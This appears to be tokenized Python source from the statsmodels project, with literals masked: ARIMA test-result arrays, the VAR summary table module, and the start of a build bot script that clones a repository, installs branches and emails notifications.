<NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> mse = np . 
array ( [ <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> 
, <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> stdp = np . 
array ( [ <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> 
<NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> icstats = np . array ( [ <NUM_LIT> , <EOL> np . nan , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT:4> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> class Bunch ( dict ) : <EOL> def __init__ ( self , ** kw ) : <EOL> dict . __init__ ( self , kw ) <EOL> self . 
__dict__ = self <EOL> results = Bunch ( llf = llf , nobs = nobs , k = k , k_exog = k_exog , sigma = sigma , chi2 = chi2 , df_model = df_model , k_ar = k_ar , k_ma = k_ma , params = params , cov_params = cov_params , xb = xb , y = y , resid = resid , yr = yr , mse = mse , stdp = stdp , icstats = icstats , ) </s>
<s> from __future__ import print_function <EOL> from statsmodels . compat . python import cStringIO , lzip , lrange , StringIO , range <EOL> import numpy as np <EOL> from statsmodels . iolib import SimpleTable <EOL> import statsmodels . tsa . vector_ar . util as util <EOL> mat = np . array <EOL> _default_table_fmt = dict ( <EOL> empty_cell = '<STR_LIT>' , <EOL> colsep = '<STR_LIT:U+0020>' , <EOL> row_pre = '<STR_LIT>' , <EOL> row_post = '<STR_LIT>' , <EOL> table_dec_above = '<STR_LIT:=>' , <EOL> table_dec_below = '<STR_LIT:=>' , <EOL> header_dec_below = '<STR_LIT:->' , <EOL> header_fmt = '<STR_LIT:%s>' , <EOL> stub_fmt = '<STR_LIT:%s>' , <EOL> title_align = '<STR_LIT:c>' , <EOL> header_align = '<STR_LIT:r>' , <EOL> data_aligns = '<STR_LIT:r>' , <EOL> stubs_align = '<STR_LIT:l>' , <EOL> fmt = '<STR_LIT>' <EOL> ) <EOL> class VARSummary ( object ) : <EOL> default_fmt = dict ( <EOL> data_fmts = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> empty_cell = '<STR_LIT>' , <EOL> colsep = '<STR_LIT:U+0020>' , <EOL> row_pre = '<STR_LIT>' , <EOL> row_post = '<STR_LIT>' , <EOL> table_dec_above = '<STR_LIT:=>' , <EOL> table_dec_below = '<STR_LIT:=>' , <EOL> header_dec_below = '<STR_LIT:->' , <EOL> header_fmt = '<STR_LIT:%s>' , <EOL> stub_fmt = '<STR_LIT:%s>' , <EOL> title_align = '<STR_LIT:c>' , <EOL> header_align = '<STR_LIT:r>' , <EOL> data_aligns = '<STR_LIT:r>' , <EOL> stubs_align = '<STR_LIT:l>' , <EOL> fmt = '<STR_LIT>' <EOL> ) <EOL> part1_fmt = dict ( default_fmt , <EOL> data_fmts = [ "<STR_LIT:%s>" ] , <EOL> colwidths = <NUM_LIT:15> , <EOL> colsep = '<STR_LIT:U+0020>' , <EOL> table_dec_below = '<STR_LIT>' , <EOL> header_dec_below = None , <EOL> ) <EOL> part2_fmt = dict ( default_fmt , <EOL> data_fmts = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> colwidths = None , <EOL> colsep = '<STR_LIT:U+0020>' , <EOL> table_dec_above = '<STR_LIT:->' , <EOL> table_dec_below = '<STR_LIT:->' , <EOL> header_dec_below = None , <EOL> ) <EOL> def 
__init__ ( self , estimator ) : <EOL> self . model = estimator <EOL> self . summary = self . make ( ) <EOL> def __repr__ ( self ) : <EOL> return self . summary <EOL> def make ( self , endog_names = None , exog_names = None ) : <EOL> """<STR_LIT>""" <EOL> buf = StringIO ( ) <EOL> buf . write ( self . _header_table ( ) + '<STR_LIT:\n>' ) <EOL> buf . write ( self . _stats_table ( ) + '<STR_LIT:\n>' ) <EOL> buf . write ( self . _coef_table ( ) + '<STR_LIT:\n>' ) <EOL> buf . write ( self . _resid_info ( ) + '<STR_LIT:\n>' ) <EOL> return buf . getvalue ( ) <EOL> def _header_table ( self ) : <EOL> import time <EOL> model = self . model <EOL> t = time . localtime ( ) <EOL> part1title = "<STR_LIT>" <EOL> part1data = [ [ model . _model_type ] , <EOL> [ "<STR_LIT>" ] , <EOL> [ time . strftime ( "<STR_LIT>" , t ) ] , <EOL> [ time . strftime ( "<STR_LIT>" , t ) ] ] <EOL> part1header = None <EOL> part1stubs = ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> part1 = SimpleTable ( part1data , part1header , part1stubs , <EOL> title = part1title , txt_fmt = self . part1_fmt ) <EOL> return str ( part1 ) <EOL> def _stats_table ( self ) : <EOL> model = self . model <EOL> part2Lstubs = ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> part2Rstubs = ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> part2Ldata = [ [ model . neqs ] , [ model . nobs ] , [ model . llf ] , [ model . aic ] ] <EOL> part2Rdata = [ [ model . bic ] , [ model . hqic ] , [ model . fpe ] , [ model . detomega ] ] <EOL> part2Lheader = None <EOL> part2L = SimpleTable ( part2Ldata , part2Lheader , part2Lstubs , <EOL> txt_fmt = self . part2_fmt ) <EOL> part2R = SimpleTable ( part2Rdata , part2Lheader , part2Rstubs , <EOL> txt_fmt = self . part2_fmt ) <EOL> part2L . extend_right ( part2R ) <EOL> return str ( part2L ) <EOL> def _coef_table ( self ) : <EOL> model = self . model <EOL> k = model . neqs <EOL> Xnames = self . model . 
exog_names <EOL> data = lzip ( model . params . T . ravel ( ) , <EOL> model . stderr . T . ravel ( ) , <EOL> model . tvalues . T . ravel ( ) , <EOL> model . pvalues . T . ravel ( ) ) <EOL> header = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> buf = StringIO ( ) <EOL> dim = k * model . k_ar + model . k_trend <EOL> for i in range ( k ) : <EOL> section = "<STR_LIT>" % model . names [ i ] <EOL> buf . write ( section + '<STR_LIT:\n>' ) <EOL> table = SimpleTable ( data [ dim * i : dim * ( i + <NUM_LIT:1> ) ] , header , <EOL> Xnames , title = None , txt_fmt = self . default_fmt ) <EOL> buf . write ( str ( table ) + '<STR_LIT:\n>' ) <EOL> if i < k - <NUM_LIT:1> : <EOL> buf . write ( '<STR_LIT:\n>' ) <EOL> return buf . getvalue ( ) <EOL> def _resid_info ( self ) : <EOL> buf = StringIO ( ) <EOL> names = self . model . names <EOL> buf . write ( "<STR_LIT>" + '<STR_LIT:\n>' ) <EOL> buf . write ( pprint_matrix ( self . model . resid_corr , names , names ) + '<STR_LIT:\n>' ) <EOL> return buf . getvalue ( ) <EOL> def causality_summary ( results , variables , equation , kind ) : <EOL> title = "<STR_LIT>" % kind <EOL> null_hyp = '<STR_LIT>' % ( variables , equation ) <EOL> return hypothesis_test_table ( results , title , null_hyp ) <EOL> def normality_summary ( results ) : <EOL> title = "<STR_LIT>" <EOL> null_hyp = '<STR_LIT>' <EOL> return hypothesis_test_table ( results , title , null_hyp ) <EOL> def hypothesis_test_table ( results , title , null_hyp ) : <EOL> fmt = dict ( _default_table_fmt , <EOL> data_fmts = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:%s>" ] ) <EOL> buf = StringIO ( ) <EOL> table = SimpleTable ( [ [ results [ '<STR_LIT>' ] , <EOL> results [ '<STR_LIT>' ] , <EOL> results [ '<STR_LIT>' ] , <EOL> str ( results [ '<STR_LIT>' ] ) ] ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] , [ '<STR_LIT>' ] , title = None , txt_fmt = fmt ) <EOL> buf . write ( title + '<STR_LIT:\n>' ) <EOL> buf . 
write ( str ( table ) + '<STR_LIT:\n>' ) <EOL> buf . write ( null_hyp + '<STR_LIT:\n>' ) <EOL> buf . write ( "<STR_LIT>" % results [ '<STR_LIT>' ] ) <EOL> buf . write ( "<STR_LIT>" % ( results [ '<STR_LIT>' ] * <NUM_LIT:100> ) ) <EOL> return buf . getvalue ( ) <EOL> def print_ic_table ( ics , selected_orders ) : <EOL> """<STR_LIT>""" <EOL> cols = sorted ( ics ) <EOL> data = mat ( [ [ "<STR_LIT>" % v for v in ics [ c ] ] for c in cols ] , <EOL> dtype = object ) . T <EOL> for i , col in enumerate ( cols ) : <EOL> idx = int ( selected_orders [ col ] ) , i <EOL> data [ idx ] = data [ idx ] + '<STR_LIT:*>' <EOL> fmt = dict ( _default_table_fmt , <EOL> data_fmts = ( "<STR_LIT:%s>" , ) * len ( cols ) ) <EOL> buf = StringIO ( ) <EOL> table = SimpleTable ( data , cols , lrange ( len ( data ) ) , <EOL> title = '<STR_LIT>' , txt_fmt = fmt ) <EOL> buf . write ( str ( table ) + '<STR_LIT:\n>' ) <EOL> buf . write ( '<STR_LIT>' + '<STR_LIT:\n>' ) <EOL> print ( buf . getvalue ( ) ) <EOL> def pprint_matrix ( values , rlabels , clabels , col_space = None ) : <EOL> buf = StringIO ( ) <EOL> T , K = len ( rlabels ) , len ( clabels ) <EOL> if col_space is None : <EOL> min_space = <NUM_LIT:10> <EOL> col_space = [ max ( len ( str ( c ) ) + <NUM_LIT:2> , min_space ) for c in clabels ] <EOL> else : <EOL> col_space = ( col_space , ) * K <EOL> row_space = max ( [ len ( str ( x ) ) for x in rlabels ] ) + <NUM_LIT:2> <EOL> head = _pfixed ( '<STR_LIT>' , row_space ) <EOL> for j , h in enumerate ( clabels ) : <EOL> head += _pfixed ( h , col_space [ j ] ) <EOL> buf . write ( head + '<STR_LIT:\n>' ) <EOL> for i , rlab in enumerate ( rlabels ) : <EOL> line = ( '<STR_LIT:%s>' % rlab ) . ljust ( row_space ) <EOL> for j in range ( K ) : <EOL> line += _pfixed ( values [ i , j ] , col_space [ j ] ) <EOL> buf . write ( line + '<STR_LIT:\n>' ) <EOL> return buf . 
getvalue ( ) <EOL> def _pfixed ( s , space , nanRep = None , float_format = None ) : <EOL> if isinstance ( s , float ) : <EOL> if float_format : <EOL> formatted = float_format ( s ) <EOL> else : <EOL> formatted = "<STR_LIT>" % s <EOL> return formatted . rjust ( space ) <EOL> else : <EOL> return ( '<STR_LIT:%s>' % s ) [ : space ] . rjust ( space ) </s>
<s> """<STR_LIT>""" <EOL> import traceback <EOL> import base64 <EOL> import subprocess <EOL> import os <EOL> import re <EOL> import shutil <EOL> import smtplib <EOL> import sys <EOL> from urllib2 import urlopen <EOL> from email . MIMEText import MIMEText <EOL> import logging <EOL> logging . basicConfig ( filename = '<STR_LIT>' <EOL> '<STR_LIT>' , level = logging . DEBUG , <EOL> format = "<STR_LIT>" ) <EOL> sys . stdout = open ( '<STR_LIT>' , <EOL> '<STR_LIT:w>' ) <EOL> sys . stderr = open ( '<STR_LIT>' , <EOL> '<STR_LIT:w>' ) <EOL> env = { '<STR_LIT>' : ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT::>' . join ( ( os . getenv ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : os . getenv ( '<STR_LIT>' , '<STR_LIT>' ) } <EOL> script = os . path . realpath ( sys . argv [ <NUM_LIT:0> ] ) <EOL> dname = os . path . abspath ( os . path . dirname ( script ) ) <EOL> gname = '<STR_LIT>' <EOL> gitdname = os . path . join ( dname , gname ) <EOL> os . chdir ( dname ) <EOL> logging . debug ( '<STR_LIT>' . format ( script ) ) <EOL> logging . debug ( '<STR_LIT>' . format ( dname ) ) <EOL> sf_account = '<STR_LIT>' <EOL> repo = '<STR_LIT>' <EOL> stable_trunk = '<STR_LIT>' <EOL> last_release = '<STR_LIT>' <EOL> branches = [ stable_trunk ] <EOL> virtual_dir = '<STR_LIT>' <EOL> virtual_dir = os . path . join ( dname , virtual_dir ) <EOL> virtual_python = os . path . join ( virtual_dir , '<STR_LIT>' , '<STR_LIT>' ) <EOL> with open ( '<STR_LIT>' ) as f : <EOL> pwd = f . readline ( ) . strip ( ) <EOL> gmail_pwd = base64 . b64decode ( pwd ) <EOL> email_name = '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' <EOL> email_name = email_name . replace ( '<STR_LIT>' , '<STR_LIT:@>' ) <EOL> gmail_pwd = gmail_pwd <EOL> to_email = [ email_name , <EOL> ( '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT:@>' ) ] <EOL> def create_virtualenv ( ) : <EOL> if not os . path . 
exists ( virtual_dir ) : <EOL> retcode = subprocess . call ( [ '<STR_LIT>' , <EOL> "<STR_LIT>" , virtual_dir ] , <EOL> stderr = sys . stderr , stdout = sys . stdout ) <EOL> if retcode != <NUM_LIT:0> : <EOL> msg = """<STR_LIT>""" <EOL> raise Exception ( msg ) <EOL> retcode = subprocess . call ( [ virtual_dir + '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if retcode != <NUM_LIT:0> : <EOL> msg = """<STR_LIT>""" <EOL> raise Exception ( msg ) <EOL> def create_update_gitdir ( ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( gitdname ) : <EOL> retcode = subprocess . call ( '<STR_LIT>' + repo , shell = True , <EOL> stdout = sys . stdout , stderr = sys . stderr ) <EOL> if retcode != <NUM_LIT:0> : <EOL> msg = """<STR_LIT>""" <EOL> raise Exception ( msg ) <EOL> else : <EOL> shutil . rmtree ( gitdname ) <EOL> create_update_gitdir ( ) <EOL> def check_version ( branch , latest_hash = None ) : <EOL> if branch == '<STR_LIT>' : <EOL> remote_dir = '<STR_LIT>' <EOL> regex = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> remote_dir = '<STR_LIT>' <EOL> regex = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> base_url = '<STR_LIT>' <EOL> page = urlopen ( base_url . format ( remote_dir ) ) . read ( ) <EOL> try : <EOL> version = re . search ( regex , page ) . group ( ) <EOL> except AttributeError : <EOL> return True <EOL> if remote_dir == '<STR_LIT>' : <EOL> if last_release [ <NUM_LIT:1> : ] == version : <EOL> return False <EOL> else : <EOL> return True <EOL> if latest_hash == version : <EOL> return False <EOL> else : <EOL> return True <EOL> def getdirs ( ) : <EOL> """<STR_LIT>""" <EOL> dirs = [ i for i in os . listdir ( dname ) ] <EOL> dirs = filter ( lambda x : not os . path . isfile ( os . path . join ( dname , x ) ) , <EOL> dirs ) <EOL> return dirs <EOL> def newdir ( dirs ) : <EOL> """<STR_LIT>""" <EOL> dirs = set ( dirs ) <EOL> newdirs = set ( [ i for i in os . listdir ( dname ) if not <EOL> os . path . isfile ( os . path . join ( dname , i ) ) ] ) <EOL> newdir = newdirs . 
difference ( dirs ) <EOL> if len ( newdir ) != <NUM_LIT:1> : <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise Exception ( msg ) <EOL> newdir = newdir . pop ( ) <EOL> return newdir <EOL> def install_branch ( branch ) : <EOL> """<STR_LIT>""" <EOL> ver = '<STR_LIT:.>' . join ( map ( str , ( sys . version_info . major , sys . version_info . minor ) ) ) <EOL> sitepack = os . path . join ( virtual_dir , '<STR_LIT>' , '<STR_LIT>' + ver , '<STR_LIT>' ) <EOL> if os . path . exists ( sitepack ) : <EOL> dir_list = os . listdir ( sitepack ) <EOL> else : <EOL> dir_list = [ ] <EOL> for f in dir_list : <EOL> if '<STR_LIT>' in f : <EOL> shutil . rmtree ( os . path . join ( sitepack , f ) ) <EOL> os . chdir ( gitdname ) <EOL> retcode = subprocess . call ( '<STR_LIT>' + branch , shell = True , <EOL> stdout = sys . stdout , stderr = sys . stderr ) <EOL> if retcode != <NUM_LIT:0> : <EOL> msg = """<STR_LIT>""" % branch <EOL> raise Exception ( msg ) <EOL> p = subprocess . Popen ( '<STR_LIT>' , shell = True , <EOL> stdout = subprocess . PIPE , stderr = sys . stderr ) <EOL> version = p . communicate ( ) [ <NUM_LIT:0> ] [ : <NUM_LIT:7> ] <EOL> retcode = subprocess . call ( "<STR_LIT:U+0020>" . join ( [ virtual_python , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> shell = True , stdout = sys . stdout , stderr = sys . stderr ) <EOL> if retcode != <NUM_LIT:0> : <EOL> msg = """<STR_LIT>""" % branch <EOL> raise Exception ( msg ) <EOL> retcode = subprocess . call ( "<STR_LIT:U+0020>" . join ( 